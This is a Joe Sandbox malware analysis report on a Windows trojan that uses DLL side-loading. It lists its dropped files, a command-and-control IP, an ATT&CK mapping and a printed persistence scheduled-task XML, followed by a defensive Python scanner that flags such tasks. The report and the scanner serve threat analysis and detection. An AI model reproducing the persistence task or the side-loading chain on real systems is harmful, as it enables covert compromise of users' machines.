Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00404FAA KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (numbers in front of a technique give the count of matched signatures):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 1 Replication Through Removable Media | 1 Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 1 Masquerading | 2 Input Capture | 1 System Time Discovery | Remote Services | 2 Input Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Modify Registry | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Obfuscated Files or Information | Cached Domain Credentials | 11 Peripheral Device Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 37 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior graph (text rendering of the graph; ID 1579418, sample Fqae7BLq4m.exe, start date 22/12/2024, architecture WINDOWS, score 88). Numbers in brackets are the created-registry-value/file counts shown on the graph nodes.

Top-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures

Fqae7BLq4m.exe [9]  (started)
  dropped: C:\Users\Public\...\Firefox Setup 132.0.2.exe (PE32)
  dropped: C:\Users\Public\Bilite\Axialis\libcurl.dll (PE32)
  dropped: C:\Users\Public\Bilite\...\RuntimeBrokers.exe (PE32)
  -> cmd.exe [1]  (signature: Bypasses PowerShell execution policy)
     -> RuntimeBrokers.exe [3 18]
        network: 43.250.172.42, ports 17091, 17092, 18852 (VPSQUANUS, China)
        dropped: C:\Users\user\AppData\Local\Temp\backup.exe (PE32)
        dropped: C:\Users\user\AppData\Local\Temp\backup.dll (PE32)
        dropped: C:\Users\user\AppData\Local\updated.ps1 (ASCII)
        -> cmd.exe [1]
           -> conhost.exe
           -> tasklist.exe [1]
           -> findstr.exe [1]
           -> 35 other processes
        -> cmd.exe [1]
           -> powershell.exe [1 23]
           -> conhost.exe
        -> cmd.exe [1]
           -> powershell.exe [39]  (signature: Loading BitLocker PowerShell Module)
           -> conhost.exe
     -> conhost.exe



Antivirus detection, submitted file:
Source | Detection | Scanner | Label
Fqae7BLq4m.exe | 42% | ReversingLabs | Win32.Trojan.DllHijack
Fqae7BLq4m.exe | 19% | Virustotal |

Antivirus detection, dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\backup.dll | 42% | ReversingLabs | Win32.Trojan.DllHijack
C:\Users\user\AppData\Local\Temp\backup.exe | 5% | ReversingLabs |
C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | 5% | ReversingLabs |
C:\Users\Public\Bilite\Axialis\libcurl.dll | 42% | ReversingLabs | Win32.Trojan.DllHijack
C:\Users\Public\Bilite\Firefox Setup 132.0.2.exe | 0% | ReversingLabs |

Note that the two DLLs carry the DllHijack label while the executables dropped beside them (RuntimeBrokers.exe, backup.exe) score only 5%, which is consistent with the DLL Side-Loading mapping in the ATT&CK matrix: the detection weight sits in the DLLs, not in the executables that load them.
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Reputation
http://pesterbdd.com/images/Pester.png4 | powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://dump.mgr.xzdesktop.cqttech.com/api/DumpInfoStat%s_%d-%02d-%02d.log | RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp | false | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | false | high
https://sectigo.com/CPS0 | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | high
http://ocsp.sectigo.com0 | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.microsoft.o | powershell.exe, 0000000E.00000002.201214927053.0000000007114000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://contoso.com/License | powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/Icon | powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | false | high
https://update-xztodolist.cqttech.com/api/v1/update/checkXZDesktopCalendarCXZUpdateModule | RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp | false | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | high
http://www.apache.org/licenses/LICENSE-2.0.html4 | powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | high
https://github.com/Pester/Pester4 | powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | high
https://aka.ms/pscore6lB | powershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ion=v4.5 | powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | false | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | false | high
https://update-xztodolist.cqttech.com/api/v1/update/check | RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp | false | unknown
http://www.quovadis.bm0 | powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://ocsp.quovadisoffshore.com0 | powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
43.250.172.42 | unknown | China | 62468 | VPSQUANUS | true
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1579418
                                                              Start date and time:2024-12-22 09:42:19 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 17m 25s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                              Run name:Suspected Instruction Hammering
Number of new started processes analysed:50
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Fqae7BLq4m.exe
                                                              Detection:MAL
                                                              Classification:mal88.troj.evad.winEXE@101/44@0/1
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 51
                                                              • Number of non-executed functions: 54
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 9036 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 9104 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:45:16 | API Interceptor | 13120606x Sleep call for process: RuntimeBrokers.exe modified
                                                              No context
                                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VPSQUANUS | 236236236.elf | malicious | Unknown | 154.91.51.168
VPSQUANUS | x.bat | malicious | Unknown | 103.230.121.81
VPSQUANUS | product.bat | malicious | Unknown | 103.230.121.81
VPSQUANUS | test.exe | malicious | Unknown | 103.230.121.81
VPSQUANUS | Filezilla-stage2.exe | malicious | Unknown | 103.230.121.81
VPSQUANUS | rebirth.dbg.elf | malicious | Mirai, Okiru | 103.252.20.25
VPSQUANUS | mips.nn.elf | malicious | Mirai, Okiru | 103.122.177.128
VPSQUANUS | la.bot.arm.elf | malicious | Mirai | 154.91.52.33
VPSQUANUS | file.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | file.exe | malicious | XWorm | 103.230.121.124
                                                              No context
                                                              No context
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:XML 1.0 document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):1893
                                                              Entropy (8bit):5.212287775015203
                                                              Encrypted:false
                                                              SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                              MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                              SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                              SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                              SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
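The scheduled-task XML previewed above is the persistence artifact worth hunting for on other hosts: it is registered for the Everyone group (S-1-1-0) at RunLevel HighestAvailable, fires 30 seconds after every logon, and names Microsoft Corporation as author while living at \AS AMD updata rather than under the \Microsoft task folder. The Python below is an added example, not code from Joe Sandbox or from the sample; it parses task definitions as they are stored on disk (UTF-16 XML under C:\Windows\System32\Tasks) and flags exactly those properties. The embedded SAMPLE_TASK is constructed from the truncated preview: its Description text and its whole <Actions> element (assumed here to launch the RuntimeBrokers.exe path the report lists as dropped) are assumptions, not recovered from the report.

```python
"""Triage Windows Task Scheduler definitions for the persistence pattern in
this report. Added example; not code from Joe Sandbox or from the sample.
SAMPLE_TASK is constructed from the truncated preview: the Description text and
the whole <Actions> element (assumed to launch the dropped RuntimeBrokers.exe)
are assumptions, not recovered from the report."""
import os
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
EVERYONE_SID = "S-1-1-0"
# Locations a standard user can write to; a task whose action lives here is
# far more often attacker-controlled than legitimate.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

SAMPLE_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2006-11-10T14:29:55.5851926</Date>
    <Author>Microsoft Corporation</Author>
    <Description>(placeholder: not readable in the report preview)</Description>
    <URI>\AS AMD updata</URI>
    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">
      <Enabled>true</Enabled>
      <Delay>PT30S</Delay>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="AllUsers">
      <GroupId>S-1-1-0</GroupId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="AllUsers">
    <Exec>
      <Command>C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe</Command>
    </Exec>
  </Actions>
</Task>"""


def _text(node, path):
    found = node.find(path, NS)
    return found.text.strip() if found is not None and found.text else ""


def parse_task(xml_bytes):
    """Extract the triage-relevant fields. Task files on disk are UTF-16 with a
    BOM, so hand the parser raw bytes rather than a decoded str."""
    root = ET.fromstring(xml_bytes)
    return {
        "uri": _text(root, "t:RegistrationInfo/t:URI"),
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "group_id": _text(root, "t:Principals/t:Principal/t:GroupId"),
        "run_level": _text(root, "t:Principals/t:Principal/t:RunLevel"),
        "has_logon_trigger": root.find("t:Triggers/t:LogonTrigger", NS) is not None,
        "logon_delay": _text(root, "t:Triggers/t:LogonTrigger/t:Delay"),
        "commands": [_text(e, "t:Command") for e in root.findall("t:Actions/t:Exec", NS)],
    }


def find_indicators(task):
    """Return the names of the suspicious properties a parsed task exhibits."""
    hits = []
    if task["group_id"] == EVERYONE_SID and task["run_level"] == "HighestAvailable":
        hits.append("everyone-highest-available")  # elevated, for every user who logs on
    if task["has_logon_trigger"]:
        hits.append("logon-trigger-delayed" if task["logon_delay"] else "logon-trigger")
    if task["author"].startswith("Microsoft") and not task["uri"].startswith("\\Microsoft\\"):
        hits.append("microsoft-author-outside-microsoft-folder")
    if any(c.lower().lstrip('"').startswith(USER_WRITABLE) for c in task["commands"]):
        hits.append("command-in-user-writable-path")
    return hits


def scan_task_store(folder=r"C:\Windows\System32\Tasks"):
    """Walk the on-disk task store and return {path: indicators} for every
    task that raises at least one indicator. Unreadable files are skipped."""
    findings = {}
    for dirpath, _, names in os.walk(folder):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    hits = find_indicators(parse_task(fh.read()))
            except (OSError, ET.ParseError):
                continue
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    demo = parse_task(SAMPLE_TASK.encode("utf-16"))
    print(demo["uri"], find_indicators(demo))
    for path, hits in scan_task_store().items():
        print(path, hits)
```

Run it as an administrator on a host under investigation; the task store is only readable with elevated rights. The indicators are deliberately coarse (legitimate software does occasionally register logon-triggered tasks with a delay), so treat a hit as a lead to review rather than a verdict, and pair it with the dropped-file paths from this report.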
